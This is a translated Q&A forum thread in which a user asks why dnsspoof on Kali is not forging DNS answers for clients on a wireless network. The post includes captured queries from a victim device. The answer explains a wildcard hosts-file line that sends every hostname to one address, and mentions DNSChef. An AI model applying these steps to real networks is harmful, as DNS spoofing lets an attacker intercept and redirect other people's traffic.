dnsspoof no falsifica la solicitud de DNS con la dirección IP de la máquina local

0

Quiero falsificar todas las solicitudes de DNS con la dirección IP de mi máquina local.

Sin embargo, al ejecutar dnsspoof , todos los clientes reciben la dirección IP real y no la dirección IP falsa de mi host.

Sé que puedo ejecutar dnsspoof usando la opción -f . Pero en este caso, solo quiero falsificar todas las solicitudes de DNS con la misma dirección de mi host local.

¿Alguna idea?

root@kali:~# dnsspoof -i wlan0
dnsspoof: listening on wlan0 [udp dst port 53 and not src 192.168.1.1]
192.168.1.106.51298 > 192.168.1.1.53:  21993+ A? api-glb-bln.smoot.apple.com
192.168.1.106.60866 > 192.168.1.1.53:  65045+ A? p09-keyvalueservice.fe.apple-dns.net
192.168.1.106.55219 > 192.168.1.1.53:  29989+ A? clients1.google.com
192.168.1.106.60383 > 192.168.1.1.53:  53500+ A? gateway.fe.apple-dns.net
192.168.1.106.58017 > 192.168.1.1.53:  51772+ A? tv2.dk
192.168.1.106.49725 > 192.168.1.1.53:  43764+ A? assets.adobedtm.com
192.168.1.106.49286 > 192.168.1.1.53:  39396+ A? shared.tv2.dk
192.168.1.106.59361 > 192.168.1.1.53:  45196+ A? tv2login.dk
192.168.1.106.59450 > 192.168.1.1.53:  61943+ A? platform.twitter.com
192.168.1.106.51695 > 192.168.1.1.53:  64740+ A? cdn.optimizely.com
192.168.1.106.62386 > 192.168.1.1.53:  2942+ A? static.chartbeat.com
    
pregunta user111854 07.05.2018 - 16:39
fuente

1 respuesta

1

Parece que dnsspoof necesita un archivo de hosts para saber qué dirección responder con cada nombre de host. En su caso, desea que todas las solicitudes se resuelvan en la misma dirección. De la página del manual de Dsniff dnsspoof :

-f hostsfile
          Specify  the  pathname  of  a  file in hosts(5) format. Only one
          hostname allowed per line (no aliases), although  hostnames  may
          contain wildcards (such as *.doubleclick.net).

Tenga en cuenta que los nombres de host en el archivo hosts pueden contener comodines para hacer coincidir varios nombres en una sola línea. Podemos usar esto para hacer coincidir todos los nombres de host con un comodín. Cree un archivo de hosts con la siguiente línea:

192.168.1.1 *

Esto hará que todos los nombres de host coincidan con tu dirección, 192.168.1.1.

Tenga en cuenta que incluso después de hacer esto y ejecutar dnsspoof con el indicador -f , es posible que todavía tenga problemas, ya que la respuesta de DNS real puede llegar a la víctima antes que la suya. Otras respuestas pueden ayudar con este problema. También hay otras herramientas que pueden adaptarse mejor a su caso de uso, como DNSChef .

    
respondido por el multithr3at3d 07.05.2018 - 20:58
fuente

Lea otras preguntas en las etiquetas